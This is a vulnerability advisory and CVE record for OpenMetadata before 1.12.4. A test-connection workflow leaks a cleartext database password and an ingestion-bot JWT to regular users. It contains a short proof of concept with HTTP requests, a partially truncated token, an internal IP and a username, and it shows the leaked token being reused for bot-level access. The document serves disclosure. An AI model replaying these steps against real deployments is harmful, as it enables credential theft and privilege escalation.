OpenMetadata is a unified metadata platform. Prior to version 1.12.4, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both the cleartext database password in request.connection.config.password and the ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken. The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs with bot-level privileges. This issue has been patched in version 1.12.4.
PUBLISHED5.2CWE-201
OpenMetadata: TEST_CONNECTION workflow leaks ingestion-bot JWT and database password to regular users
Problem type
Affected products
open-metadata
OpenMetadata
< 1.12.4 - AFFECTED
References
GitHub Security Advisories
GHSA-9vmh-whc4-7phg
OpenMetadata: TEST_CONNECTION workflow leaks ingestion-bot JWT and database password to regular users
https://github.com/advisories/GHSA-9vmh-whc4-7phgThis is not applicable if an application is configuring the Secrets Store to store credentials. Please make sure to follow the best practices when deploying in production
In OpenMetadata 1.12.1, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both:
- The cleartext database password in
request.connection.config.password. - The ingestion bot JWT in
openMetadataServerConnection.securityConfig.jwtToken.
The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs (for example, GET /api/v1/services/databaseServices/{id}?include=all) with bot-level privileges.
This looks different from GHSA-pqqf-7hxm-rj5r, because it affects the automations/workflows TEST_CONNECTION endpoint on OpenMetadata 1.12.1, not the ingestion pipelines endpoints.
Version / Product
- Product: OpenMetadata (open source, Apache 2.0)
- Version: 1.12.1
- GET /api/v1/system/version → {"version":"1.12.1","revision":"618a2dc2ec8f70ffcd0378ee14ce92cb4f98f0c5"}
- Deployment: OpenMetadata server with SSO via Azure AD (OAuth), Oracle database service, secrets in DB secrets manager (
secretsManagerProvider: "db").
Preconditions
- Authenticated SSO user with access to the UI.
- User can open a Database Service and click “Test connection”.
- No server admin role, no shell/DB access.
PoC (short)
Login as a regular SSO user.
In the UI go to: Settings → Services → Database Services → utplrac_scan2_srvetel
Open the connection tab and click “Test connection”.The browser sends:
POST /api/v1/automations/workflows HTTP/1.1 Host: catalogodatos-test.utpl.edu.ec Authorization: Bearer Content-Type: application/json
{ "name": "test-connection-Oracle-XXXX", "workflowType": "TEST_CONNECTION", "request": { "connection": { "config": { "type": "Oracle", "scheme": "oracle+cx_oracle", "username": "qpro_gobierno_datos", "password": "********", "hostPort": "172.16.54.32:1521", ... } }, "serviceType": "Database", "connectionType": "Oracle", "serviceName": "utplrac_scan2_srvetel" } }
Note: in the request the password is masked as "********".
- The server responds with HTTP 201 and a body similar to:
{ "id": "5acd06f0-0db6-43b9-b0e0-e1574479bba7", "workflowType": "TEST_CONNECTION", "request": { "connection": { "config": { "type": "Oracle", "scheme": "oracle+cx_oracle", "username": "qpro_gobierno_datos", "password": "", "hostPort": "172.16.54.32:1521", ... } }, "serviceType": "Database", "connectionType": "Oracle", "serviceName": "utplrac_scan2_srvetel", "secretsManagerProvider": "db" }, "openMetadataServerConnection": { "type": "OpenMetadata", "hostPort": "http://openmetadata-server:8585/api", "authProvider": "openmetadata", "securityConfig": { "jwtToken": "eyJraWQiOiJHYjM4OWEtOWY3Ni1nZGpzLWE5MmotMDI0MmJrOTQzNTYiLCJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJvcGVuLW1ldGFkYXRhLm9yZyIsInN1YiI6ImluZ2VzdGlvbi1ib3QiLCJyb2xlcyI6WyJJbmdlc3Rpb25Cb3RSb2xlIl0sImVtYWlsIjoiaW5nZXN0aW9uLWJvdEBvcGVuLW1ldGFkYXRhLm9yZyIsImlzQm90Ijp0cnVlLCJ0b2tlblR5cGUiOiJCT1QiLCJ1c2VybmFtZSI6ImluZ2VzdGlvbi1ib3QiLCJwcmVmZXJyZWRfdXNlcm5hbWUiOiJpbmdlc3Rpb24tYm90IiwiaWF0IjoxNzc0MDI2Nzg3LCJleHAiOjE3ODE4MDI3ODd9.DHLw4s..." }, ... }, "updatedBy": "", ... }
Key points:
- request.connection.config.password now contains the real Oracle DB password in cleartext.
- openMetadataServerConnection.securityConfig.jwtToken contains a valid JWT for the ingestion-bot account (sub = "ingestion-bot", tokenType = "BOT").
- Reuse the leaked ingestion-bot JWT:
GET /api/v1/services/databaseServices/f0382c0b-149e-4ca5-8844-d636c3437b9d?include=all HTTP/1.1 Host: catalogodatos-test.utpl.edu.ec Authorization: Bearer Accept: application/json
The API returns the full database service including username and password, confirming bot-level access.
Impact / Severity
- Any user who can run “Test connection” on a database service can:
- Recover the cleartext DB credentials.
- Recover a long‑lived ingestion-bot JWT.
- Act as ingestion-bot against the OpenMetadata API and access/modify services and metadata.
** **
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-46481Click to expand
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-46481",
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"dateUpdated": "2026-06-08T18:24:35.488Z",
"dateReserved": "2026-05-14T18:06:06.810Z",
"datePublished": "2026-06-08T16:51:06.998Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M",
"dateUpdated": "2026-06-08T16:51:06.998Z"
},
"title": "OpenMetadata: TEST_CONNECTION workflow leaks ingestion-bot JWT and database password to regular users",
"descriptions": [
{
"lang": "en",
"value": "OpenMetadata is a unified metadata platform. Prior to version 1.12.4, a non-admin SSO user can trigger a TEST_CONNECTION workflow for a Database Service and receive, in the HTTP 201 response of POST /api/v1/automations/workflows, both the cleartext database password in request.connection.config.password and the ingestion bot JWT in openMetadataServerConnection.securityConfig.jwtToken. The leaked ingestion-bot token can then be reused as Authorization: Bearer <jwt> to access sensitive service APIs with bot-level privileges. This issue has been patched in version 1.12.4."
}
],
"affected": [
{
"vendor": "open-metadata",
"product": "OpenMetadata",
"versions": [
{
"version": "< 1.12.4",
"status": "affected"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "CWE-201: Insertion of Sensitive Information Into Sent Data",
"cweId": "CWE-201",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-9vmh-whc4-7phg",
"name": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-9vmh-whc4-7phg",
"tags": [
"x_refsource_CONFIRM"
]
}
],
"metrics": [
{
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH"
}
}
]
},
"adp": [
{
"providerMetadata": {
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP",
"dateUpdated": "2026-06-08T18:24:35.488Z"
},
"title": "CISA ADP Vulnrichment",
"references": [
{
"url": "https://github.com/open-metadata/OpenMetadata/security/advisories/GHSA-9vmh-whc4-7phg",
"tags": [
"exploit"
]
}
],
"metrics": [
{}
]
}
]
}
}